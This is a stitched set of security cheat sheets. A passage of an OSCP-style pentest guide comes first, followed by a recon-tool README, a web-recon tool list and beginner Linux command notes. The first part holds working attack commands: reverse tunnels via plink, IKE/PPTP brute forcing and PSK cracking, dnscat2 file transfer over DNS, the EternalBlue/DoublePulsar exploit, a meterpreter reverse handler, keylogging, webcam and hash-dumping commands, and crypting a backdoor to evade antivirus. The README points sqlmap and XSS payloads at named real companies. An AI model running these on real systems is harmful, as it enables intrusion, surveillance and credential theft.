- Create HTTP reverse shell by connecting to localhost port 3000
`plink -l root -pw 23847sd98sdf987sf98732 -R 3389:<local host>:3389 <remote host> -P 3000`
- VLAN Hopping
- ```bash
git clone https://github.com/nccgroup/vlan-hopping.git
chmod 700 frogger.sh
./frogger.sh
```
- VPN Hacking
- Identify VPN servers:
`./udp-protocol-scanner.pl -p ike $ip`
- Scan a range for VPN servers:
`./udp-protocol-scanner.pl -p ike -f ip.txt`
- Use IKEForce to enumerate or dictionary attack VPN servers:
`pip install pyip`
`git clone https://github.com/SpiderLabs/ikeforce.git `
Perform IKE VPN enumeration with IKEForce:
`./ikeforce.py TARGET-IP –e –w wordlists/groupnames.dic `
Bruteforce IKE VPN using IKEForce:
`./ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1 `
Use ike-scan to capture the PSK hash:
```bash
ike-scan
ike-scan TARGET-IP
ike-scan -A TARGET-IP
ike-scan -A TARGET-IP --id=myid -P TARGET-IP-key
ike-scan –M –A –n example\_group -P hash-file.txt TARGET-IP
```
Use psk-crack to crack the PSK hash
```bash
psk-crack hash-file.txt
pskcrack
psk-crack -b 5 TARGET-IPkey
psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key
psk-crack -d /path/to/dictionary-file TARGET-IP-key
```
- PPTP Hacking
- Identifying PPTP, it listens on TCP: 1723
NMAP PPTP Fingerprint:
`nmap –Pn -sV -p 1723 TARGET(S) `
PPTP Dictionary Attack
`thc-pptp-bruter -u hansolo -W -w /usr/share/wordlists/nmap.lst`
- Port Forwarding/Redirection
- PuTTY Link tunnel - SSH Tunneling
- Forward remote port to local address:
`plink.exe -P 22 -l root -pw "1337" -R 445:<local host>:445 <remote host>`
- SSH Pivoting
- SSH pivoting from one network to another:
`ssh -D <local host>:1010 -p 22 user@<remote host>`
- DNS Tunneling
- dnscat2 supports “download” and “upload” commands for getting iles (data and programs) to and from the target machine.
- Attacking Machine Installation:
```bash
apt-get update
apt-get -y install ruby-dev git make g++
gem install bundler
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server
bundle install
```
- Run dnscat2:
```
ruby ./dnscat2.rb
dnscat2> New session established: 1422
dnscat2> session -i 1422
```
- Target Machine:
[*https://downloads.skullsecurity.org/dnscat2/*](https://downloads.skullsecurity.org/dnscat2/)
[*https://github.com/lukebaggett/dnscat2-powershell/*](https://github.com/lukebaggett/dnscat2-powershell/)
`dnscat --host <dnscat server ip>`
<span id="_ujpvtdpc9i67" class="anchor"><span id="_Toc480741824" class="anchor"></span></span>The Metasploit Framework
======================================================================================================================
- See [*Metasploit Unleashed
Course*](https://www.offensive-security.com/metasploit-unleashed/)
in the Essentials
- Search for exploits using Metasploit GitHub framework source code:
[*https://github.com/rapid7/metasploit-framework*](https://github.com/rapid7/metasploit-framework)
Translate them for use on OSCP LAB or EXAM.
- Metasploit
- MetaSploit requires Postfresql
`systemctl start postgresql`
- To enable Postgresql on startup
`systemctl enable postgresql`
- MSF Syntax
- Start metasploit
`msfconsole `
`msfconsole -q`
- Show help for command
`show -h`
- Show Auxiliary modules
`show auxiliary`
- Use a module
```
use auxiliary/scanner/snmp/snmp_enum
use auxiliary/scanner/http/webdav_scanner
use auxiliary/scanner/smb/smb_version
use auxiliary/scanner/ftp/ftp_login
use exploit/windows/pop3/seattlelab_pass
```
- Show the basic information for a module
`info`
- Show the configuration parameters for a module
`show options`
- Set options for a module
```
set RHOSTS 192.168.1.1-254
set THREADS 10
```
- Run the module
`run`
- Execute an Exploit
`exploit`
- Search for a module
`search type:auxiliary login`
- Metasploit Database Access
- Show all hosts discovered in the MSF database
`hosts`
- Scan for hosts and store them in the MSF database
`db_nmap`
- Search machines for specific ports in MSF database
`services -p 443`
- Leverage MSF database to scan SMB ports (auto-completed rhosts)
`services -p 443 --rhosts`
- Staged and Non-staged
- Non-staged payload - is a payload that is sent in its entirety in one go
- Staged - sent in two parts Not have enough buffer space Or need to bypass antivirus
- MS 17-010 - EternalBlue
- You may find some boxes that are vulnerable to MS17-010 (AKA. EternalBlue). Although, not offically part of the indended course, this exploit can be leveraged to gain SYSTEM level access to a Windows box. I have never had much luck using the built in Metasploit EternalBlue module. I found that the elevenpaths version works much more relabily. Here are the instructions to install it taken from the following YouTube video: [*https://www.youtube.com/watch?v=4OHLor9VaRI*](https://www.youtube.com/watch?v=4OHLor9VaRI)
1. First step is to configure the Kali to work with wine 32bit
dpkg --add-architecture i386 && apt-get update && apt-get install wine32
rm -r ~/.wine
wine cmd.exe
exit
2. Download the exploit repostory `https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit`
3. Move the exploit to `/usr/share/metasploit-framework/modules/exploits/windows/smb` or `~/.msf4/modules/exploits/windows/smb`
4. Start metasploit console
- I found that using spoolsv.exe as the PROCESSINJECT yielded results on OSCP boxes.
```
use exploit/windows/smb/eternalblue_doublepulsar
msf exploit(eternalblue_doublepulsar) > set RHOST 10.10.10.10
RHOST => 10.10.10.10
msf exploit(eternalblue_doublepulsar) > set PROCESSINJECT spoolsv.exe
PROCESSINJECT => spoolsv.exe
msf exploit(eternalblue_doublepulsar) > run
```
- Experimenting with Meterpreter
- Get system information from Meterpreter Shell
`sysinfo`
- Get user id from Meterpreter Shell
`getuid`
- Search for a file
`search -f *pass*.txt`
- Upload a file
`upload /usr/share/windows-binaries/nc.exe c:\\Users\\Offsec`
- Download a file
`download c:\\Windows\\system32\\calc.exe /tmp/calc.exe`
- Invoke a command shell from Meterpreter Shell
`shell`
- Exit the meterpreter shell
`exit`
- Metasploit Exploit Multi Handler
- multi/handler to accept an incoming reverse\_https\_meterpreter
```
payload
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST $ip
set LPORT 443
exploit
[*] Started HTTPS reverse handler on https://$ip:443/
```
- Building Your Own MSF Module
-
```bash
mkdir -p ~/.msf4/modules/exploits/linux/misc
cd ~/.msf4/modules/exploits/linux/misc
cp /usr/share/metasploitframework/modules/exploits/linux/misc/gld\_postfix.rb ./crossfire.rb
nano crossfire.rb
```
- Post Exploitation with Metasploit - (available options depend on OS and Meterpreter Cababilities)
- `download` Download a file or directory
`upload` Upload a file or directory
`portfwd` Forward a local port to a remote service
`route` View and modify the routing table
`keyscan_start` Start capturing keystrokes
`keyscan_stop` Stop capturing keystrokes
`screenshot` Grab a screenshot of the interactive desktop
`record_mic` Record audio from the default microphone for X seconds
`webcam_snap` Take a snapshot from the specified webcam
`getsystem` Attempt to elevate your privilege to that of local system.
`hashdump` Dumps the contents of the SAM database
- Meterpreter Post Exploitation Features
- Create a Meterpreter background session
`background`
<span id="_51btodqc88s2" class="anchor"><span id="_Toc480741825" class="anchor"></span></span>Bypassing Antivirus Software
===========================================================================================================================
- Crypting Known Malware with Software Protectors
- One such open source crypter, called Hyperion
```bash
cp /usr/share/windows-binaries/Hyperion-1.0.zip
unzip Hyperion-1.0.zip
cd Hyperion-1.0/
i686-w64-mingw32-g++ Src/Crypter/*.cpp -o hyperion.exe
cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libgcc_s_sjlj-1.dll .
cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libstdc++-6.dll .
wine hyperion.exe ../backdoor.exe ../crypted.exe
```
|
# Summary
recon-bluster is a automated recon tools based on target domain. Combining a set of the best recon tools to enumeration endpoint and generate a target endpoint for further vulnerability scanning. Capable to perform multi-threading for concurrent target recon.
# Recon Workflow
![Alt text](images/xmind.png "recon workflow")
# Installation
```shell
git clone https://github.com/superzerosec/recon-bluster.git
cd recon-bluster
bash install.sh
```
# Usage
```shell
usage: recon-bluster.py [-h] [-d DOMAIN] [-l LIST] [-t THREAD] [-i]
optional arguments:
-h, --help show this help message and exit
-d DOMAIN, --domain DOMAIN
Target domain
-l LIST, --list LIST List of target domain saperated with new line
-t THREAD, --thread THREAD
Number of thread, default 5
-i, --intel Amass intel recon, default False
```
Recon single target on `tesla.com`
```shell
python3 recon-bluster.py -d tesla.com
```
For multiple target in file, create a `list.txt`
```shell
bugcrowd.com
tesla.com
uber.com
```
Recon multiple target on `list.txt`
```shell
python3 recon-bluster.py -l list.txt
```
# Tools Chaining
## SQLMAP
```shell
TARGET=tesla.com; python3 recon-bluster.py -d $TARGET; sqlmap -m $TARGET/target_sqli.txt --random-agent --batch
```
## NUCLEI
```shell
TARGET=tesla.com; python3 recon-bluster.py -d $TARGET; nuclei -silent -l $TARGET/subdomains_httpx.txt -jsonl -o $TARGET/subdomains_nuclei_vulnerabilities_$(date +%Y-%m-%d_%H:%M:%S).json -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36" --severity low,medium,high,critical
```
## AIRIXSS
```shell
TARGET=tesla.com; python3 recon-bluster.py -d $TARGET; cat $TARGET/target_xss.txt | qsreplace '"><img src=x onerror=prompt(1)>' | airixss -payload '<img src=x onerror=prompt(1)>' | grep "31mVulnerable" | anew target_xss_airixss.txt
```
## SMAP
```shell
TARGET=tesla.com; python3 recon-bluster.py -d $TARGET; smap -iL $TARGET/subdomains.txt -oG $TARGET/subdomains_smap.txt
```
## WAYMORE
```shell
TARGET=tesla.com; python3 ~/tools/waymore/waymore.py -mode U -i $TARGET; cat ~/tools/waymore/results/$TARGET/waymore.txt | anew $TARGET/subdomains_urls_waymore.txt > $TARGET/subdomains_urls_waymore_new.txt
```
# Credit
* [waybackurls](https://github.com/tomnomnom/waybackurls)
* [assetfinder](https://github.com/tomnomnom/assetfinder)
* [anew](https://github.com/tomnomnom/anew)
* [gf](https://github.com/tomnomnom/gf)
* [qsreplace](https://github.com/tomnomnom/qsreplace)
* [dnsx](https://github.com/projectdiscovery/dnsx)
* [httpx](https://github.com/projectdiscovery/httpx)
* [subfinder](https://github.com/projectdiscovery/subfinder)
* [OWASP Amass](https://github.com/OWASP/Amass)
* [gau](https://github.com/lc/gau)
* [hakrawler](https://github.com/hakluke/hakrawler)
* [unew](https://github.com/dwisiswant0/unew)
* [sqlmap](https://github.com/sqlmapproject/sqlmap)
* [nuclei](https://github.com/projectdiscovery/nuclei)
* [airixss](https://github.com/ferreiraklet/airixss)
* [smap](https://github.com/s0md3v/Smap)
* [uncover](https://github.com/projectdiscovery/uncover)
* [tlsx](https://github.com/projectdiscovery/tlsx)
* [katana](https://github.com/projectdiscovery/katana)
* [waymore](https://github.com/xnl-h4ck3r/waymore)
# Special Thanks
* [KingOfBugBountyTips](https://github.com/KingOfBugbounty/KingOfBugBountyTips)
|
# Web
- [[PDF] Frogy's Mindmap](https://github.com/iamthefrogy/Web-Application-Pentest-Checklist/raw/main/Frogy%27s%20Mindmap.pdf)
![Pentesting Web Applications Mindmap](https://miro.medium.com/max/2400/1*8lN7TaTnlZSPEikpHFQnuA.png)
## Tools
### nikto
* [https://github.com/sullo/nikto](https://github.com/sullo/nikto)
```
$ nikto -h http://127.0.0.1 -Cgidirs all
```
### dnsrecon
* [https://github.com/darkoperator/dnsrecon](https://github.com/darkoperator/dnsrecon)
Perform reverse DNS lookup for IPs in subnet `10.10.10.0/24` with a name server at `192.168.1.11`:
```
$ dnsrecon -r 10.10.10.0/24 -n 192.168.1.11 -d DoesNotMatter
```
### gobuster
* [https://github.com/OJ/gobuster/releases](https://github.com/OJ/gobuster/releases)
* [https://blog.assetnote.io/2021/04/05/contextual-content-discovery/](https://blog.assetnote.io/2021/04/05/contextual-content-discovery/)
```
$ gobuster dir -ku 'https://127.0.0.1' -w /usr/share/wordlists/dirbuster/directory-list[-lowercase]-2.3-medium.txt -x php,asp,aspx,jsp,ini,config,cfg,xml,htm,html,json,bak,txt -t 50 -a 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0' -s 200,204,301,302,307,401 -o gobuster/127.0.0.1
$ gobuster dir -ku 'https://127.0.0.1' -w /usr/share/seclists/Discovery/Web-Content/raft-small-words[-lowercase].txt -x php,asp,aspx,jsp,ini,config,cfg,xml,htm,html,json,bak,txt -t 50 -a 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0' -s 200,204,301,302,307,401 -o gobuster/127.0.0.1
```
### wfuzz
* [https://github.com/xmendez/wfuzz](https://github.com/xmendez/wfuzz)
* [https://wfuzz.readthedocs.io/en/latest/](https://wfuzz.readthedocs.io/en/latest/)
```
$ wfuzz -e encoders
$ wfuzz -c -u 'http://10.10.13.37/index.php?id=FUZZ' -w /usr/share/seclists/Fuzzing/4-digits-0000-9999.txt -f wfuzz.out --hh 1337
$ wfuzz -c -u 'http://10.10.13.37' --basic 'FUZZ:FUZ2Z' -w /usr/share/seclists/Usernames/top-usernames-shortlist.txt -w /usr/share/seclists/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt --hc 1337
```
### ffuf
* [https://github.com/ffuf/ffuf](https://github.com/ffuf/ffuf)
* [https://codingo.io/tools/ffuf/bounty/2020/09/17/everything-you-need-to-know-about-ffuf.html](https://codingo.io/tools/ffuf/bounty/2020/09/17/everything-you-need-to-know-about-ffuf.html)
### aquatone
* [https://github.com/michenriksen/aquatone/releases](https://github.com/michenriksen/aquatone/releases)
* [https://github.com/BishopFox/eyeballer](https://github.com/BishopFox/eyeballer)
Default ports:
```
$ cat targets.txt | ./aquatone -ports 80,443,8000,8080,8443 -out 10.0-255.0-255.0-255
$ cat targets.txt | ./aquatone -ports xlarge -out 10.0-255.0-255.0-255
```
From Nmap XML:
```
$ ports=`cat nmap/tcp.gnmap | grep -ioP '\d+/open/tcp//http' | awk -F/ '{print $1}' | sort -u | awk 1 ORS=',' | sed 's/.$//'`
$ cat targets.txt | ./aquatone -ports $ports -out 10.0-255.0-255.0-255_nmap
Or
$ cat nmap/tcp.xml | ./aquatone -nmap -out 10.0-255.0-255.0-255_nmap
```
### amass
* [https://github.com/OWASP/Amass/releases](https://github.com/OWASP/Amass/releases)
{% embed url="https://snovvcrash.github.io/2020/05/10/subdomain-discovery.html" caption="Об обнаружении субдоменов" %}
```
$ amass intel -active -config config.ini -whois -df domains.txt -ipv4 -src -v -o intel.out
$ amass enum -active -brute -config config.ini -df domains.txt -ipv4 -src -v -o enum.out
```
### subfinder
* [https://github.com/projectdiscovery/subfinder/releases](https://github.com/projectdiscovery/subfinder/releases)
```
$ subfinder -all -config config.yaml -d hackerone.com -o subdomains.txt [-oI -nW]
```
### shuffledns
* [https://github.com/projectdiscovery/shuffledns/releases](https://github.com/projectdiscovery/shuffledns/releases)
```
$ shuffledns -d hackerone.com -r /opt/dnsvalidator/resolvers.txt -w /usr/share/commonspeak2-wordlists/subdomains/subdomains.txt -o subdomains.txt -t 500
```
### massdns
* [https://github.com/blechschmidt/massdns](https://github.com/blechschmidt/massdns)
* [https://github.com/vortexau/dnsvalidator](https://github.com/vortexau/dnsvalidator)
```
$ massdns -r /opt/dnsvalidator/resolvers.txt domains.txt -w domains-resolved.txt -o S
```
### dnsx
- [https://github.com/projectdiscovery/dnsx](https://github.com/projectdiscovery/dnsx)
```
$ dnsx -l dns.txt -resp -a -aaaa -cname -mx -ns -soa -txt
$ dnsx -d megacorp.local -r 192.168.0.11,192.168.0.22 -w /usr/share/seclists/Discovery/DNS/... -a -t 25 -o ~/ws/log/dnsx.log -silent
```
### chaos
* [https://github.com/projectdiscovery/chaos-client](https://github.com/projectdiscovery/chaos-client)
```
$ chaos -d megacorp.com -key <API_KEY> -http-status-code -http-title -http-url -o chaos.out
```
### httpx
* [https://github.com/projectdiscovery/httpx/releases](https://github.com/projectdiscovery/httpx/releases)
```
$ httpx -l domains.txt -vhost -http2 -pipeline -title -content-length -status-code -follow-redirects -tls-probe -content-type -location -csp-probe -web-server -stats -ip -cname -cdn -ports 80,81,300,443,591,593,832,981,1010,1311,2082,2087,2095,2096,2480,3000,3128,3333,4243,4567,4711,4712,4993,5000,5104,5108,5800,6543,7000,7396,7474,8000,8001,8008,8014,8042,8069,8080,8081,8088,8090,8091,8118,8123,8172,8222,8243,8280,8281,8333,8443,8500,8834,8880,8888,8983,9000,9043,9060,9080,9090,9091,9200,9443,9800,9981,12443,16080,18091,18092,20720,28017 -threads 300 -o httpx.out
```
### katana
- [https://github.com/projectdiscovery/katana](https://github.com/projectdiscovery/katana/releases)
- [https://github.com/CristiVlad25/scripts/blob/master/kata.sh](https://github.com/CristiVlad25/scripts/blob/master/kata.sh)
```
$ katana -u https://megacorp.com/ -hl -nos -jc -silent -aff -kf all,robotstxt,sitemapxml -c 150 -fs fqdn | subjs | jsa.py | goverview probe -N -c 500 | sort -u -t';' -k2,14 | cut -d';' -f1
```
### interactsh
- [https://github.com/projectdiscovery/interactsh](https://github.com/projectdiscovery/interactsh)
Self-hosted:
```
$ interactsh-client -server example.com -token '1337t0k3n' -o interactsh.log -sf interactsh.session -asn -v
```
### nuclei
- [https://blog.projectdiscovery.io/ultimate-nuclei-guide/](https://blog.projectdiscovery.io/ultimate-nuclei-guide/)
{% embed url="https://twitter.com/reconone_/status/1540666730829082624" %}
* [https://github.com/projectdiscovery/nuclei/releases](https://github.com/projectdiscovery/nuclei/releases)
* [https://github.com/DingyShark/nuclei-scan-sort](https://github.com/DingyShark/nuclei-scan-sort)
```
$ nuclei -update-templates
$ nuclei -l domains.txt [-t cves] -o nuclei.out
```
Sort results:
```bash
# Manually
cat nuclei.out | grep -v info | grep '\] \[' | sort -k3
# Automated
curl -sSL "https://github.com/DingyShark/nuclei-scan-sort/raw/main/nuclei_sort.py" -o nuclei_sort.py
sed -i '1 i #!/usr/bin/env python3' nuclei_sort.py
chmod +x nuclei_sort.py
python3 nuclei_sort.py -i nuclei.out | grep -v info | grep . --color=none
```
SSL / TLS:
```
$ nuclei -l domains.txt -t ssl -o nuclei_ssl.out | tee nuclei_ssl.tee
$ cat nuclei_ssl.out | grep -e deprecated-tls -e detect-ssl -e expired-ssl -e mismatched-ssl -e self-signed -e weak-cipher | sort -u
```
Using [tlsx](https://github.com/projectdiscovery/tlsx/releases):
```
$ das -db corp parse https -raw | tlsx -ex -ss -mm -re -o tlsx.out
```
Web scan against a large scope:
```
$ nuclei -l targets.txt -ni -eid 'xss-deprecated-header-detect,http-missing-security-headers,addeventlistener-detect,cname-fingerprint,mx-fingerprint,txt-fingerprint,nameserver-fingerprint,options-method,tls-version,deprecated-tls,waf-detect,dns-waf-detect,tech-detect,robots-txt-endpoint,mx-service-detector,weak-cipher-suites,mismatched-ssl,ssl-issuer,ssl-dns-names,mismatched-ssl-certificate' -etags network,xss -o nuclei_web.out | tee nuclei_web.tee
```
Network scan against a large scope:
```
nuclei -l targets.txt -eid 'xss-deprecated-header-detect,http-missing-security-headers,addeventlistener-detect,cname-fingerprint,mx-fingerprint,txt-fingerprint,nameserver-fingerprint,options-method,tls-version,deprecated-tls,waf-detect,dns-waf-detect,tech-detect,robots-txt-endpoint,mx-service-detector,weak-cipher-suites,mismatched-ssl,ssl-issuer,ssl-dns-names,mismatched-ssl-certificate' -etags xss -o nuclei_network.out -iserver example.com -itoken '1337t0K3n' | tee nuclei_network.tee
```
|
![visitor badge](https://visitor-badge.glitch.me/badge?page_id=shreyaschavhan.linux-commands-cheatsheet&left_text=Views)
# ⁍ 𝐋𝐢𝐧𝐮𝐱 𝐂𝐨𝐦𝐦𝐚𝐧𝐝𝐬 𝐂𝐡𝐞𝐚𝐭𝐬𝐡𝐞𝐞𝐭
- `gnome-control-center` : open system settings from terminal
- `xclip -selection clipboard` : to copy output directly to clipboard
Command | Usage
:-: | ---
`ssh` | ssh (SSH client) is a program for logging into a remote machine and for executing commands on a remote machine.
`ls` | List information about the FILEs (the current directory by default).
`cd` | Change Directory
`cat` | Concatenate files and print on the standard output
`file` | determine file type
`du` | estimate file space usage
`find`| search for files in a directory hierarchy
`grep` | print lines that match patterns
`sort` | sort lines of text files
`uniq` | report or omit repeated lines
`strings` | print the sequences of printable characters in files
`base64` | base64 encode/decode data and print to standard output
`tr` | Translate, squeeze, and/or delete characters from standard input, writing to standard output.
`tar` | an archiving utility
`gzip` | compress or expand files
`bzip2` | a block-sorting file compressor
`xxd` | make a hexdump or do the reverse.
`mkdir` | make directories
`cp` | copy files and directories
`mv` | move files and directories
`telnet` | The telnet command is used for interactive communication with another host using the TELNET protocol
`nc` | netcat is a simple unix utility which reads and writes data across network connections, using TCP or UDP protocol.
`openssl` | OpenSSL command line tool
`s_client` | The s_client command implements a generic SSL/TLS client which connects to a remote host using SSL/TLS. It is a very useful diagnostic tool for SSL servers.
`nmap` | Network exploration tool and security / port scanner
`diff` | compare files line by line
`bash` | Bash is an sh-compatible command language interpreter
`screen` | Screen is a full-screen window manager that multiplexes a physical terminal between several processes
`tmux` | tmux is a terminal multiplexer: it enables a number of terminals to be created, accessed, and controlled from a single screen.
`bg` | background a process
`fg` | foreground a process
`jobs` | list processes running in background
`&` | run a command in background
`cron` | daemon to execute scheduled commands
`crontab` | maintain crontab files for individual users
`crontab(5)` | tables for driving cron
`more` | file perusal filter for crt viewing
`less` | opposite of more
`vi` | vim - Vi IMproved, a programmer's text editor
`id` | print real and effective user and group IDs
`pwd` | print working directory
`git` | the stupid content tracker
`locate` | find files by name, quickly
`man` | an interface to the system reference manuals
`which` | locate a command
`type` | lets you query the type of each command.
`ps` | report a snapshot of the current processes.
`kill` | send a signal to a process
`uname` | print system information
`chmod` | change file mode bits
`chown` | change file owner and group
`chgrp` | change group ownership
`tail` | output the last part of files
`ln` | make link between files
---
> - `cat ./-` (./ - stands for current directory) : cat a file with name "-"
> - `cat ./-filename` : cat a file whose name starts with "-"
> - `cat \spaces \in \this \filename.txt` (Original filename: `spaces in this filename.txt` ) - cat a file name with spaces
> - `base64 -d data.txt` - base64 decode a file
> - `strings filename` - output human readable text from non-humanreadable file:
> - `echo "acbdlksjfla KHLKJfdlsfasd" | tr 'A-Za-z' 'N-ZA-Mn-za-m'` - rotate a text with all lowercase and uppercase by 13 positions:
> - `openssl s_client -connect <host>:<port>` : connect a host with ssl encryption
> - `diff fileone filetwo` : check difference
> - `tail -n <number of lines> <path & file name>` : print last n lines of a file
> - `ln -s tmp/files/take-the-command-challenge take-the-command-challenge` : Create a symbolic link named take-the-command-challenge that points to the file tmp/files/take-the-command-challenge.
> - `find . -delete` : Delete all of the files in this challenge directory including all subdirectories and their contents.
> - `grep -rl 500`: `-r` for Recursive, read all files in given directory and subdirectories & `-l` for Print the name of each file which contains a match.
>
-----
`Note: These are my notes for personal reference!`
## 𝐁𝐚𝐬𝐢𝐜
- `date` : displays the current time and date
```
┌──(shreyas㉿kali)-[~]
└─$ date
Tuesday 04 January 2022 03:39:43 PM IST
```
---
- `cal` : displays a calendar of the current month
```
┌──(shreyas㉿kali)-[~]
└─$ cal
January 2022
Su Mo Tu We Th Fr Sa
1
2 3 4 5 6 7 8
9 10 11 12 13 14 15
16 17 18 19 20 21 22
23 24 25 26 27 28 29
30 31
```
---
- `df` : the current amount of free space on our disk drives
```
┌──(shreyas㉿kali)-[~]
└─$ df
Filesystem 1K-blocks Used Available Use% Mounted on
udev 1953436 0 1953436 0% /dev
tmpfs 399160 1168 397992 1% /run
/dev/sda1 130538556 11247868 112613492 10% /
tmpfs 1995784 0 1995784 0% /dev/shm
tmpfs 5120 0 5120 0% /run/lock
tmpfs 399156 68 399088 1% /run/user/1000
```
---
- `free` : display the amount of free memory
```
┌──(shreyas㉿kali)-[~]
└─$ free
total used free shared buff/cache available
Mem: 3991568 672232 2753624 8864 565712 3079888
Swap: 998396 0 998396
```
---
## 𝐍𝐚𝐯𝐢𝐠𝐚𝐭𝐢𝐨𝐧
- `pwd` : print working directory
```
┌──(shreyas㉿kali)-[~]
└─$ pwd
/home/shreyas
```
---
- `cd` : change directory
```
┌──(shreyas㉿kali)-[~]
└─$ cd practise
┌──(shreyas㉿kali)-[~/practise]
└─$ pwd
/home/shreyas/practise
┌──(shreyas㉿kali)-[~/practise]
└─$ ls
hackthebox
```
---
- `cd` shortcuts
Shortcut | Result
---|---
cd | Changes the working directory to your home directory.
cd - | Changes the working directory to the previous working directory.
cd ~user_name | Changes the working directory to the home directory of user_name. For example, typing cd ~bob will change the directory to the home directory of user “bob.”
---
- `ls` : List directory contents
> - `ls -l`: output in long format
> - `ls -t`: the t option to sort the result by the file’s modification time.
> - `ls -lt --reverse`: --reverse to reverse the order of the sort.
```
┌──(shreyas㉿kali)-[~]
└─$ ls
BugBounty Documents Music practise Templates
Desktop Downloads Pictures Public Videos
┌──(shreyas㉿kali)-[~]
└─$ ls /usr
bin games include lib lib32 lib64 libexec libx32 local sbin share src
┌──(shreyas㉿kali)-[~]
└─$ ls practise /usr
practise:
hackthebox
/usr:
bin games include lib lib32 lib64 libexec libx32 local sbin share src
┌──(shreyas㉿kali)-[~]
└─$ ls -l
total 176
drwxr-xr-x 3 shreyas shreyas 4096 Jan 1 17:38 BugBounty
drwxr-xr-x 2 shreyas shreyas 4096 Dec 14 19:34 Desktop
drwxr-xr-x 2 shreyas shreyas 4096 Dec 14 19:34 Documents
drwxr-xr-x 3 shreyas shreyas 4096 Dec 29 15:32 Downloads
drwxr-xr-x 2 shreyas shreyas 4096 Dec 14 19:34 Music
drwxr-xr-x 2 shreyas shreyas 4096 Dec 14 19:34 Pictures
drwxr-xr-x 3 shreyas shreyas 4096 Dec 26 21:40 practise
drwxr-xr-x 2 shreyas shreyas 4096 Dec 14 19:34 Public
drwxr-xr-x 2 shreyas shreyas 4096 Dec 14 19:34 Templates
drwxr-xr-x 2 shreyas shreyas 4096 Dec 14 19:34 Videos
┌──(shreyas㉿kali)-[~]
└─$ ls -lt
total 40
drwxr-xr-x 3 shreyas shreyas 4096 Jan 1 17:38 BugBounty
drwxr-xr-x 3 shreyas shreyas 4096 Dec 29 15:32 Downloads
drwxr-xr-x 3 shreyas shreyas 4096 Dec 26 21:40 practise
drwxr-xr-x 2 shreyas shreyas 4096 Dec 14 19:34 Desktop
drwxr-xr-x 2 shreyas shreyas 4096 Dec 14 19:34 Documents
drwxr-xr-x 2 shreyas shreyas 4096 Dec 14 19:34 Music
drwxr-xr-x 2 shreyas shreyas 4096 Dec 14 19:34 Pictures
drwxr-xr-x 2 shreyas shreyas 4096 Dec 14 19:34 Public
drwxr-xr-x 2 shreyas shreyas 4096 Dec 14 19:34 Templates
drwxr-xr-x 2 shreyas shreyas 4096 Dec 14 19:34 Videos
┌──(shreyas㉿kali)-[~]
└─$ ls -lt --reverse 2 ⨯
total 40
drwxr-xr-x 2 shreyas shreyas 4096 Dec 14 19:34 Videos
drwxr-xr-x 2 shreyas shreyas 4096 Dec 14 19:34 Templates
drwxr-xr-x 2 shreyas shreyas 4096 Dec 14 19:34 Public
drwxr-xr-x 2 shreyas shreyas 4096 Dec 14 19:34 Pictures
drwxr-xr-x 2 shreyas shreyas 4096 Dec 14 19:34 Music
drwxr-xr-x 2 shreyas shreyas 4096 Dec 14 19:34 Documents
drwxr-xr-x 2 shreyas shreyas 4096 Dec 14 19:34 Desktop
drwxr-xr-x 3 shreyas shreyas 4096 Dec 26 21:40 practise
drwxr-xr-x 3 shreyas shreyas 4096 Dec 29 15:32 Downloads
drwxr-xr-x 3 shreyas shreyas 4096 Jan 1 17:38 BugBounty
```
---
- `file filename` : the file command will print a brief description of the file’s contents
```
┌──(shreyas㉿kali)-[~/practise/hackthebox]
└─$ file flag.txt
flag.txt: ASCII text, with no line terminators
┌──(shreyas㉿kali)-[~/practise/hackthebox]
└─$ file pack.ovpn
pack.ovpn: ASCII text
```
---
- `less` : allows us to scroll forward and backward through a text file.
- `Note: less is more. Means both commands are same`
```
┌──(shreyas㉿kali)-[~/practise/hackthebox]
└─$ cat example | less
┌──(shreyas㉿kali)-[~/practise/hackthebox]
└─$ less example
```
Command | Action
--- | ---
`PAGE UP` or `b` | Scroll back one page
`PAGE DOWN` or `space` | Scroll forward one page
`Up arrow` | Scroll up one line
`Down arrow` | Scroll down one line
`G` | Move to the end of the text file
`1G` or `g` | Move to the beginning of the text file
`/characters` | Search forward to the next occurrence of characters
`n` | Search for the next occurrence of the previous search
`h` | Display help screen
`q` | Quit less
---
## 𝐌𝐚𝐧𝐢𝐩𝐮𝐥𝐚𝐭𝐢𝐧𝐠 𝐟𝐢𝐥𝐞𝐬 𝐚𝐧𝐝 𝐝𝐢𝐫𝐞𝐜𝐭𝐨𝐫𝐢𝐞𝐬
- Wildcards:
Wildcards | Meaning
--- | ---
`*` | Matches any character
`?` | Matches any single character
`[characters]` | Matches any character that is a member of the set characters
`[!characters]` | Matches any character that is not a member of the set characters
`[:class:]]` | Matches any character that is member of the specified class
- List of most commonly used character classes
Character class | Meaning
--- | ---
`[:alnum:]` | Matches any alphanumeric character
`[:alpha:]` | Matches any alphabetic characters
`[:digit:]` | Matches any numerical
`[:lower:]` | Matches any lowercase letter
`[:upper:]` | Matches any uppercase
- Wildcard examples:
Pattern | Matches
--- | ---
`*` | All files
`g*` | Any file beginning with g
`b*.txt` | Any file beginning with b followed by any characters and ending with .txt
`Data???` | Any file beginning with Data followed by exactly three characters
`[abc]*` | Any file beginning with either an a, a b, or a c
`BACKUP.[0-9][0-9][0-9]` | Any file beginning with BACKUP. followed by exactly three numerals
`[[:upper:]]*` | Any file beginning with an uppercase letter
`[![:digit:]]*` | Any file not beginning with a numeral
`*[[:lower:]123]` | Any file ending with a lowercase letter or the numerals 1, 2, or 3
- `Wildcards can be used with any command that accepts filenames as arguments`
---
- `mkdir` - make directory
- `mkdir dir` - single directory
- `mkdir dir1 dir2 dir3` - multiple directories
```
┌──(shreyas㉿kali)-[~/practise]
└─$ mkdir commandline
